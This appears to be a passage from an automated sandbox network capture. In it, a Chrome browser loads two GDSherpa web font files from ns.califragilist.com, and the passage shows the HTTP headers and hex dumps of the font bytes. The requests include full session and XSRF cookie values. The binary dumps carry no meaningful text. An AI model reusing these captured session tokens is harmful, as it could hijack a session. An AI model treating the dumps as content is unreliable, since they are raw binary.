                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:59 UTC1113INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:59 GMT
                                                                                                                                              Content-Type: font/woff
                                                                                                                                              Content-Length: 35970
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="GDSherpa-bold.woff"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 15:48:29 GMT
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BivJdJ%2F2JrZ9TXWYugXd%2BizhwMTCGezwcFHu46m6MabSrUDodf%2BCRjhIpjGY625n4dl8hFanAlUBR5KL0PSCGkNh88Z8mNkdxPnwhLA8Gzlhkd%2BvVOWOe1Z01ACDFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3329&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2276&delivery_rate=875453&cwnd=250&unsent_bytes=0&cid=0debabe18687cb6d&ts=26&x=0"
                                                                                                                                              CF-Cache-Status: EXPIRED
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6455fa80a6b14-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1882&delivery_rate=2724365&cwnd=250&unsent_bytes=0&cid=40433d9fd525688f&ts=571&x=0"
                                                                                                                                              2024-11-06 15:55:59 UTC256INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                                                                                                              Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 00 00 00 24 10 f8 09 15 68 6d 74 78 00 00 74 30 00 00 03 80 00 00 07 78 3f 73 90 23 6c 6f 63 61 00 00 77 b0 00 00 03 a8 00 00 03 be 4c 43 25 1c 6d 61 78 70 00 00 7b 58 00 00 00 20 00 00 00 20 03 35 0c fc 6e 61 6d 65 00 00 7b 78 00 00 02 c8 00 00 06 03 d7 eb b7 a5 70 6f 73 74 00 00 7e 40 00 00 06 94 00 00 0b fb 31 2b f3 2c 70 72 65 70 00 00 8a d0 00 00 00 81 00 00 00 8d 19 50 02 10 78 da ed 5c 0d 74 55 d5 95 de 3b 79 dc bc f7 08 21 be 89 21 09 10 52 8d 34 a2 22 28 08 22 2a 22 a2 55 e4 af d6 56 b4 5d 33 ae a9 e3 72 a8 cb 35 63 07 ac 1d 6a f9 b5 2e 01 87 5f e5 37 55 b0 94 89 48 01 15 31 4d 53 45 08 10 10 30 62 a0 11 62 26 86 bf 18 92 f0 88 f1 25 e4 cc 77 f6 fd c9 7d c9 7b 89 da fa a0 b3 e6 ee 75 ef bb f7 9e 73 cf de 67 ff ef 73 6f 42 4c 44 7e 1a 43 93 29 6e
                                                                                                                                              Data Ascii: $hmtxt0x?s#locawLC%maxp{X 5name{xpost~@1+,prepPx\tU;y!!R4"("*"UV]3r5cj._7UH1MSE0bb&%w}{usgsoBLD~C)n
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 58 02 4d 49 b1 34 05 52 c2 bd b9 98 e3 3c fc ce 87 9e 2d 14 49 25 f2 62 b4 69 0b 36 ad 37 19 98 93 2d bf 61 4b ab 41 fc c6 66 13 13 66 08 d9 03 5b 3e f6 02 78 70 93 e7 06 70 79 2c e9 1b 98 8d 1e 2b 80 b1 32 30 56 a2 d8 6d 2e 7e d7 a2 2d 4f c6 f2 82 f2 44 50 9d 06 a9 e5 63 d4 bd 88 09 07 84 ea 4a 19 69 2e 5a b5 fe 6a dd 35 2d 3f 04 4a 6a 40 49 35 74 b7 41 46 29 12 bd c9 14 8a 0a a1 a3 af 89 2c 72 78 2a 66 f9 14 24 f8 0b fc 3e 4d 03 20 89 d7 c0 39 03 f4 32 bd 0e bd d2 fd d7 c9 f1 90 1c 2b e4 58 85 11 d2 31 b3 9e b0 7b 4d 51 81 50 b3 0d 52 6b 90 96 17 d1 52 41 39 68 c9 87 e7 2a 80 3e 4f 6f 29 a1 4b c0 f5 f5 f0 1b 53 d1 02 af a9 6a f1 5c 35 ed 52 8b 2c ff 51 06 6d 2d 81 47 da 02 6d cd e7 de 6a 25 34 b6 8c c7 42 da 53 d4 02 9e d1 b2 0d 33 59 01 a9 a5 43 bb 7b
                                                                                                                                              Data Ascii: XMI4R<-I%bi67-aKAff[>xppy,+20Vm.~-ODPcJi.Zj5-?Jj@I5tAF),rx*f$>M 92+X1{MQPRkRA9h*>Oo)KSj\5R,Qm-Gmj%4BS3YC{
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: b5 9b 19 73 89 97 99 16 63 45 bc aa 8b 94 2f 7a 05 b8 bf 7a 54 0d 44 9e 56 25 f2 ff dc b6 75 59 0b 2e 83 37 3d a1 0e 62 3f e4 54 e6 83 ac 4a a4 19 ed 31 c9 d9 9d 7c b7 93 6c 36 c2 ca e0 c5 be c5 dc 73 a9 0d 2a 97 f2 e9 79 da 88 f3 dd ba 92 14 89 af 97 b6 35 ea 18 b4 a0 16 1e a9 c4 5e 7f a7 25 ce 93 87 70 b8 5a 56 e8 5e c5 be 28 a6 54 ef fb 7f 09 7e 73 df a7 fe a3 a5 5a 3d a3 46 c9 3a 6b 95 e9 bd cd d8 83 df 1a 55 aa 8e 22 63 ca 56 15 6a 9d f3 cc 28 3b 5b 82 07 b8 2f e6 3a da 02 0d ac a7 4b e1 81 1a 9c f7 61 71 d6 bb 52 dd fe 6e d8 5b 3d 8f b5 a6 14 e3 dc 0e de e6 73 75 9c 12 cd 35 7d c9 3c 9b 74 46 ec ca 92 6d ea c4 d3 9a 19 70 8c 3c 94 47 bd aa 0e a9 8d e4 53 4d e0 61 39 38 59 ae 57 01 d5 02 6d ef 90 74 29 24 7e 14 b6 7e 1a 3d 35 e5 85 32 a3 05 72 3c 05
                                                                                                                                              Data Ascii: scE/zzTDV%uY.7=b?TJ1|l6s*y5^%pZV^(T~sZ=F:kU"cVj(;[/:KaqRn[=su5}<tFmp<GSMa98YWmt)$~~=52r<
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 2d 5e bd d6 7e 16 fb 48 48 eb 0b 58 d2 34 58 fe 1e 44 fa 0f 9c 67 7a a1 55 e2 09 ac aa d6 d6 2f f5 e2 57 5d 47 89 da 5e ac f2 60 37 11 32 76 a9 10 b5 b7 d1 75 43 63 84 95 74 8f ab d2 69 c3 f9 36 d7 95 9d 7d 3d d8 69 85 64 b8 fa 78 c2 d7 2f 41 5d 01 bc c3 1a 77 14 0e ab 36 aa 2c cd 6a fd 1a af d9 8e ad 90 92 f3 6e 4d 15 da 39 5c 74 0b 6f d3 5e d4 3e 3b 45 3c e8 65 af e6 76 b0 82 61 38 6b c4 a5 ed 46 6d 68 c5 6d d7 64 d1 b4 53 f4 b2 36 aa 65 06 6d 5b b3 bc c2 17 d2 bf 41 f4 d2 d3 c9 dc 9a 5a 7d 8d 95 3b 37 69 88 90 93 46 91 5e eb fb 54 f8 f5 70 ef 13 72 ad ef 9d b1 6c 34 e8 ba 57 d1 d1 7b 38 f4 f2 4b fe bc db d1 9c e4 c8 6f eb 5d 95 d9 f9 30 ad 6d d5 f0 8a 8e 75 b2 53 bd f4 ba e9 0e cf 19 b1 cf 83 ad 3e 6f 67 7f 6d 2b 13 67 b6 b5 91 56 34 5d b4 17 a0 a6 ef
                                                                                                                                              Data Ascii: -^~HHX4XDgzU/W]G^`72vuCcti6}=idx/A]w6,jnM9\to^>;E<eva8kFmhmdS6em[AZ};7iF^Tprl4W{8Ko]0muS>ogm+gV4]
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: c0 8f 2c 78 c0 81 49 0e fc ad b6 db 51 2d 07 e8 fb 74 9f ec b7 03 ee a2 ef c9 de 15 56 aa 7d 77 02 7c c6 1d e8 79 87 40 7f ba 04 b6 3b 11 d0 03 b1 f4 bb c8 5a b2 2d 9f dc 0d f1 43 ff ff 25 9f 44 95 51 80 6b c8 fe 1a dd de 7a ba ce af a4 cb 71 1c 43 ee ef 5a ed d8 fb 1d 39 de 61 e1 cd 92 bf 0c d0 11 b2 37 6c ee 25 89 0f e3 24 17 60 c9 05 52 e4 6d 60 0a 28 e8 86 76 9d 35 a5 58 90 0a f8 0e 28 ed 81 27 d2 00 a9 d0 c2 74 e8 5b 86 fc 37 ad 9e 80 ef 42 93 7a c1 7a 7b 03 0c 68 57 1f 3c 95 85 67 58 32 b0 54 cc b5 2f 66 a5 df 0f dd 2b de eb 52 58 cf 48 b4 8e 02 8f 52 20 c5 07 70 fc 67 fa 29 f0 3e 41 4f e3 fc 97 80 4b e9 19 9a 89 31 66 d1 1c e0 7d 96 16 63 9c 25 a0 db 43 cb 68 15 70 ad a6 97 81 6b 2d 20 81 5e 05 f4 81 0f fc 1d b8 bc 0e 30 01 1e f0 f7 e0 cc 7a 80 9f
                                                                                                                                              Data Ascii: ,xIQ-tV}w|y@;Z-C%DQkzqCZ9a7l%$`Rm`(v5X('t[7Bzz{hW<gX2T/f+RXHR pg)>AOK1f}c%Chpk- ^0z
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 4c 2c 79 26 ce 64 eb 35 6d bb 8c 6a b5 81 ae 5a 4c 95 dd f8 5b bf 71 47 f1 77 36 5e d5 2e 9e de b2 4f ed d1 63 6a b4 fd 60 53 6d ed 23 53 fd 9f 4a db b2 ee 2b 1a a3 2c d7 3e 53 96 5b f1 6a 9b 32 f4 1a 87 02 d3 d5 aa 37 92 fa bf 74 81 bb 45 00 00 00 78 da 63 60 66 99 c6 1c c4 c0 ca c0 c2 6a cc 72 86 81 81 61 26 84 66 02 e1 08 06 54 c0 8e cc 71 73 74 f3 07 52 0a bf 59 d8 72 fe e5 30 9c e0 d8 c7 e4 a5 c0 c0 30 19 24 c7 fc 82 2d 07 24 c7 c0 0c 00 39 34 0c f8 00 00 78 da 8d 95 09 94 4e 65 1c c6 7f cf 9d 45 a1 6c 61 b2 5c 77 3e 4c a4 84 8c ad 45 cb 0c 2a 29 a4 42 34 4a cb 90 f6 4c 08 63 8b 12 c3 60 b4 20 23 86 66 d0 31 46 26 46 06 43 b6 2c 61 8c f5 fb be f6 68 9f 16 4b 66 fa cf 52 a7 3a 75 f4 9e f3 de f7 fe cf 7b ee bd cf b9 ff e7 f7 bc 40 08 65 b3 1e b2 2b 61
                                                                                                                                              Data Ascii: L,y&d5mjZL[qGw6^.Ocj`Sm#SJ+,>S[j27tExc`fjra&fTqstRYr00$-$94xNeEla\w>LE*)B4JLc` #f1F&FC,ahKfR:u{@e+a
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 4c cd 32 ee f7 2b 5f 4b b5 dd 4e 9f 44 23 7b ba ed 44 1b d7 43 4b fc ab 97 35 b9 b4 7f 25 9d dc a2 03 c6 dd 5c ed d6 db 76 5a 8d 26 9f 83 d6 d3 24 eb f0 48 ed b5 2c e8 6a 89 d0 dd 72 a0 8c ff be a5 ec 63 19 50 42 fd 24 96 ab 97 79 ac 5f b9 df e2 d4 d3 3c 77 f7 ef a7 1d ba 82 00 00 78 da d4 bd 77 60 d3 c7 d9 38 7e f7 19 92 bc 2d cb f2 5e b2 6c cb 03 4f 59 96 b7 85 59 5e 18 4f 8c 07 78 63 63 1b 63 f6 0e 7b 86 04 08 64 11 c8 24 94 24 84 52 56 48 02 21 4d 9a 84 b6 d0 bc 0d 6d da a6 49 9a b6 69 4a 1a d2 b7 ed eb 24 2d 58 1f ff 9e bb cf b0 2c 5b 49 fb be df 7f 7e 06 5b d2 e9 b9 fb 3c f7 dc 73 cf ba e7 ee 10 83 0e 22 c4 be c5 be 82 58 a4 46 9a 0b 3c c7 20 26 2d 49 67 d0 1a 62 b5 06 ed 41 36 73 e4 3a 73 c3 7e 84 7d 65 64 e6 42 e6 af 76 3f 84 10 46 e5 a8 44 d3 c2
                                                                                                                                              Data Ascii: L2+_KND#{DCK5%\vZ&$H,jrcPB$y_<wxw`8~-^lOYY^Oxccc{d$$RVH!MmIiJ$-X,[I~[<s"XF< &-IgbA6s:s~}edBv?FD
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: a6 09 ba e4 c3 00 19 7d 59 68 96 d0 10 b8 5c 60 5a 46 4e f0 3b ef f6 fd 4d ac a7 aa a4 f3 15 c6 c0 5d cd 00 52 b8 0c d3 31 00 04 69 6d 3f 3f ad 9f c4 d5 80 14 41 c9 08 88 9d c7 6d 78 31 fc 6b 1b 16 8e dd 16 8e 0d 43 83 cf 71 0d 77 d6 71 d1 77 3f 26 bf 12 4e 5f d3 39 13 61 0b 55 43 63 4a d3 2c 16 5b 86 86 39 75 10 20 86 c9 d8 92 56 47 99 39 c3 82 fd 0c 34 37 12 cd 7e 7c 67 1d fb bb 11 03 91 2b 64 be 3c 0f f3 45 87 4c 28 d9 96 08 2c 2d 71 38 0f 4d 29 12 4f ef 8f 51 64 b8 bf 49 6f 02 c6 86 61 53 d1 61 8b 19 93 7a 92 9c 31 51 29 93 c2 c8 3c ce 32 a7 85 d1 ef d5 d4 7c 0f e3 d3 a7 31 26 ef 84 d1 d3 4b 9f ec 48 4e ee 78 72 a9 f4 ea bf fa 1a d6 1c 38 80 35 d7 56 af be 26 fc f3 c0 01 e1 9f d7 56 7f 56 bd e7 7c 67 e7 f9 3d d5 f2 ab 28 03 b9 3e e8 b7 37 a0 94 68 33
                                                                                                                                              Data Ascii: }Yh\`ZFN;M]R1im??Amx1kCqwqw?&N_9aUCcJ,[9u VG947~|g+d<EL(,-q8M)OQdIoaSaz1Q)<2|1&KHNxr85V&VV|g=(>7h3
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 48 fe de 04 f5 07 d6 17 f5 dd 54 3f 47 01 28 1a c5 a2 42 5b 9e 9e 07 9d 4b d9 81 f8 55 9d 30 b1 11 56 a1 0e 0d 78 55 e0 5b 81 03 43 2c a0 a0 40 04 86 69 44 58 60 74 50 34 54 0d 88 d7 6a dd 80 b1 45 9f 2e 4e 12 96 a2 8f 85 25 19 4e 84 66 00 b8 7b 5c 80 e4 ea f9 a6 e7 c6 14 d6 a5 a6 d6 15 c5 59 53 18 ad 7d 20 39 db 92 36 25 2b 27 09 3c 40 ea fd a5 84 77 e5 a7 d6 17 c6 18 0b eb d2 f3 db c3 ee fc 8c df 95 9b 9c 60 b5 26 24 e7 0a 8f 88 7e 21 f8 9e 42 25 bf 0f 78 39 04 85 a3 e9 b6 a9 81 98 63 40 41 72 4c 99 b7 0a 0c eb 52 b0 b1 30 c3 e3 0e aa 73 c8 24 24 dc 0c 76 38 4c ca 50 22 11 c3 c3 f4 3a 2f 4f 0f 77 37 0d 0a c1 21 6a 90 8a 38 1a d0 cf b2 a6 d3 ae 98 b1 8a a0 2d fa 5c 2a 0c d8 1f 5e b2 a5 c8 2c 3b ab 97 18 73 77 57 46 42 74 86 7e 51 fc 06 fb 69 40 5c a8 5c
                                                                                                                                              Data Ascii: HT?G(B[KU0VxU[C,@iDX`tP4TjE.N%Nf{\YS} 96%+'<@w`&$~!B%x9c@ArLR0s$$v8LP":/Ow7!j8-\*^,;swWFBt~Qi@\\


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              63192.168.2.1849828188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1308OUTGET /GDSherpa-regular.woff2 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:00 UTC1118INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:00 GMT
                                                                                                                                              Content-Type: font/woff2
                                                                                                                                              Content-Length: 28584
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="GDSherpa-regular.woff2"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 15:48:28 GMT
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0jHGU3XSmnjXSHWxvDnx2zXofU7a8lG83BNq6LKGLfLwWGniymfv%2BlaCb4s8ImZDuicHlqhQ2z92wTwji%2BXjB2Tkbl3Vi3IJf%2BcFAzDQVP3pefo%2By4%2BcWlsyV2tTEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3345&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2279&delivery_rate=826248&cwnd=226&unsent_bytes=0&cid=805d5c16b4986bc1&ts=31&x=0"
                                                                                                                                              CF-Cache-Status: EXPIRED
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6455fa950e85b-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1479&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1886&delivery_rate=2062678&cwnd=95&unsent_bytes=0&cid=e3ae7e1e805673bb&ts=1261&x=0"
                                                                                                                                              2024-11-06 15:56:00 UTC251INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57
                                                                                                                                              Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: f8 13 be d9 d9 8c a2 1d 9b a8 70 25 87 11 46 eb 65 fa 72 22 79 47 8c bc e1 0d 8b 92 c1 66 b3 4d 33 f2 5d 18 55 1b 70 f3 a0 b7 1c 8d 45 19 a1 3c 9d cb 3a e4 db 6a 81 9b 45 b7 f8 c1 e1 b0 ec a7 c9 b6 74 91 bb 98 ef 21 c7 16 ca bf a1 7e 61 b5 c0 03 4a fd 6d 98 ee 1c 94 66 e3 82 64 a7 65 45 ac c3 bb 3e d4 3a f4 39 85 0a fc c7 d9 99 2c 36 4b 7b e8 71 b2 15 36 65 b8 17 34 3a 7a b4 e5 d3 ff 7f d5 b4 7b ef 7b ef ff 0f 80 24 86 93 20 8a 94 9c 42 1a 83 d4 e6 39 3a 30 c6 47 0b 8d 36 e4 39 52 d3 b9 dc 14 bb 6d d7 a5 aa 6a 43 57 ac 6d 10 5d 3a 7b f7 70 e0 8f 3f 50 eb 4f 91 42 fa c8 45 cc b6 01 dd c4 75 9a 4a 9f 0a 5f a5 a0 ff a6 fa 1a f1 cc 13 08 64 64 3d cb 20 6c d9 bf f3 53 4a 9b b3 66 6a 6d cd ed 19 e7 5c 86 85 d3 9e f2 8b 86 29 a5 0d c0 36 cb cd 9d e7 e6 c2 d8 6d
                                                                                                                                              Data Ascii: p%Fer"yGfM3]UpE<:jEt!~aJmfdeE>:9,6K{q6e4:z{{$ B9:0G69RmjCWm]:{p?POBEuJ_dd= lSJfjm\)6m
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: f6 d1 c7 9f 7c fa d9 e7 5f 7c f9 d5 d7 df 7c db 5d f7 bd 64 0f 0c 27 26 a7 a6 47 33 b3 fb f6 1f 38 78 68 6e 71 69 79 65 75 6d fd e4 a9 b3 e3 8d 73 e7 af 5e bf 79 ef fe 83 87 8f b6 1e 3f f9 f3 9f 58 9a 82 86 1f 14 46 8a 40 1a 1b 7a 01 35 e4 a7 cb 42 c2 8c cb 67 c9 7e 38 c8 2a 82 f2 62 14 42 0d 1b 75 31 c1 78 4a 5e bf 2c 2b 6d 8b 27 04 9e 3e 6d e9 7b 86 76 fb 60 50 1b 34 94 88 22 33 51 bc a1 68 24 f2 32 83 65 61 3f 18 48 15 94 c8 55 27 f2 4b de c9 51 8a dc 48 4d a6 31 ea c4 68 65 e5 5d b1 81 46 26 93 b0 07 f7 31 7a 10 ab d2 82 1f 29 0c 97 2c 1d f4 28 5a 41 13 73 52 90 c2 af a0 ce 1d c8 91 f5 2a 07 8b 48 c9 1f 54 95 4a c4 b9 30 36 d5 68 9c d9 ac 1e 6f 6a 04 5a 91 19 3f ba 30 2d 51 a6 a7 0d db 81 6a 2a 88 76 89 af 47 89 e1 2a 1a 89 50 0e 52 f2 35 30 aa 1c f3
                                                                                                                                              Data Ascii: |_||]d'&G38xhnqiyeums^y?XF@z5Bg~8*bBu1xJ^,+m'>m{v`P4"3Qh$2ea?HU'KQHM1he]F&1z),(ZAsR*HTJ06hojZ?0-Qj*vG*PR50
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: 4c 44 82 9a e7 f5 70 28 82 4f 23 f1 4c f0 1f 64 40 c9 5d ef 4e 34 73 9b 4f 1b c9 64 37 06 61 ef df 1b 02 4a c5 59 98 4b 0f 36 d0 5a 73 f5 66 c0 15 ed 9b ba b7 ff 63 21 49 05 47 7d 49 d8 17 b6 ee 07 ce d7 67 ec 43 6b 60 27 b7 64 26 32 b9 85 27 73 35 1c 97 af d5 11 87 28 82 6b db ba 8b 44 03 ea 74 51 f8 50 29 92 60 37 24 39 9a f2 78 10 00 7e 0c f8 fb af 87 98 f5 21 fa 03 f0 fe 0b c0 e7 1e 18 3f 20 9f 15 d5 73 9b e0 ea 0d c0 0a 55 22 1f d7 be 95 c7 07 d0 10 c0 9f 4b 7d 9f 65 ef 23 8a 59 c2 cf f6 39 45 cb af 3e 0e 84 bc 8b 2b 32 5e 84 60 79 e3 43 df da 81 bc 1f 6f ed af cd 01 69 36 13 85 22 36 87 26 df 8a bb 36 57 23 cd e1 00 6a 45 42 61 66 80 b9 f2 a8 ae 64 0c 8a 50 5b ca f7 b7 1a 74 11 11 3c f2 04 30 61 e5 e5 c9 53 28 31 2f f8 9a ee d5 63 81 ca 11 9a 97 35
                                                                                                                                              Data Ascii: LDp(O#Ld@]N4sOd7aJYK6Zsfc!IG}IgCk`'d&2's5(kDtQP)`7$9x~!? sU"K}e#Y9E>+2^`yCoi6"6&6W#jEBafdP[t<0aS(1/c5
